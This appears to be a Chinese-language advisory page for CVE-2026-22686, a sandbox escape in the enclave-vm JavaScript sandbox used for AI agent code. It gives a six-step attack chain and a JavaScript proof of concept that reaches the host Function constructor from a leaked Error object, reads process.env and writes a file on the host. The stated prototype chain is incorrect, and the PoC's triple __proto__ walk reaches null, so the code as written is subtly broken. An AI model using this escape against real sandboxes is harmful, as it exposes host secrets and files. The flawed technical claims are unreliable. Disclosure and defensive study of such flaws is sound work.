CVE-2026-22686: Enclave沙箱逃逸漏洞导致远程代码执行

漏洞信息

漏洞编号

CVE-2026-22686

漏洞类型

沙箱逃逸 / 远程代码执行

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

enclave-vm (Enclave JavaScript Sandbox)

漏洞概述

Enclave是一款专为AI智能体代码安全执行设计的JavaScript沙箱环境。在2.7.0版本之前，enclave-vm存在严重的沙箱逃逸漏洞，允许不受信任的沙箱化JavaScript代码在主机Node.js运行时环境中执行任意代码。该漏洞的核心问题在于：当工具调用失败时，enclave-vm会将主机端的Error对象暴露给沙箱化代码。这个Error对象保留了主机域的原型链，攻击者可以通过遍历原型链访问主机端的Function构造函数。利用主机Function构造函数，攻击者可以编译并执行任意JavaScript代码，完全绕过沙箱限制，从而访问敏感资源如process.env、文件系统和网络。此漏洞破坏了enclave-vm隔离不受信任代码的核心安全保证，CVSS评分达到满分10.0，属于最严重的安全漏洞级别。

技术细节

漏洞原理：当沙箱中的JavaScript代码触发工具调用失败时，enclave-vm会将一个主机端的Error对象传递给沙箱代码。该Error对象保留了完整的主机域原型链，即Error.prototype -> Object.prototype -> Function.prototype。攻击者可以通过以下方式利用：1) 故意触发主机错误；2) 遍历原型链获取Function构造函数；3) 使用Function构造函数构造任意JavaScript代码字符串；4) 在主机上下文中执行该代码。攻击者利用此方式可以完全绕过沙箱限制，直接访问主机的process.env获取环境变量和敏感信息，访问fs模块进行任意文件读写操作，以及进行网络请求等危险操作。修复方案在2.7.0版本中移除了对主机端Error对象的直接暴露，或对原型链进行了隔离处理。

攻击链分析

STEP 1

步骤1

攻击者在沙箱环境中故意触发一个工具调用失败，获取主机端Error对象

STEP 2

步骤2

遍历Error对象的原型链：Error.prototype -> Object.prototype -> Function.prototype

STEP 3

步骤3

通过原型链获取主机端的Function构造函数引用

STEP 4

步骤4

使用Function构造函数构造任意JavaScript代码字符串

STEP 5

步骤5

在主机上下文中执行构造的代码，完全绕过沙箱限制

STEP 6

步骤6

访问敏感资源如process.env、文件系统(fs模块)和网络，执行任意恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-22686 PoC - Sandbox Escape via Error Prototype Chain
// Target: enclave-vm < 2.7.0

// Step 1: Intentionally trigger a tool invocation failure to get host Error object
try {
    // Call a non-existent tool to trigger error
    enclave.callTool('non_existent_tool_xyz');
} catch (hostError) {
    // Step 2: Traverse the prototype chain to reach host Function constructor
    const getFunction = hostError.__proto__.__proto__.__proto__;
    
    // Step 3: Use host Function constructor to execute arbitrary code
    const executeOnHost = getFunction.constructor;
    
    // Execute arbitrary command on host - read sensitive env variables
    const result = executeOnHost('process.env')();
    console.log('Host env stolen:', result);
    
    // Alternative: Execute arbitrary code
    executeOnHost('require("fs").writeFileSync("/tmp/pwned.txt", "sandbox escaped")')();
}

// Simplified PoC - Direct prototype chain traversal
const maliciousCode = `
    try { dummy_tool_call(); } 
    catch(e) { 
        // Climb prototype chain to get Function
        const Fn = e.__proto__.__proto__.__proto__;
        // Execute code on host
        Fn.constructor('console.log(process.env.HOME)')(); 
    }
`;

影响范围

enclave-vm < 2.7.0

enclave (npm package) < 2.7.0

防御指南

临时缓解措施

目前没有已知的临时缓解措施可以完全防止此漏洞利用。建议立即升级到enclave-vm 2.7.0或更高版本。在升级前，应避免在生产环境中使用enclave沙箱执行任何不受信任的代码，并密切监控相关系统日志以检测可能的攻击行为。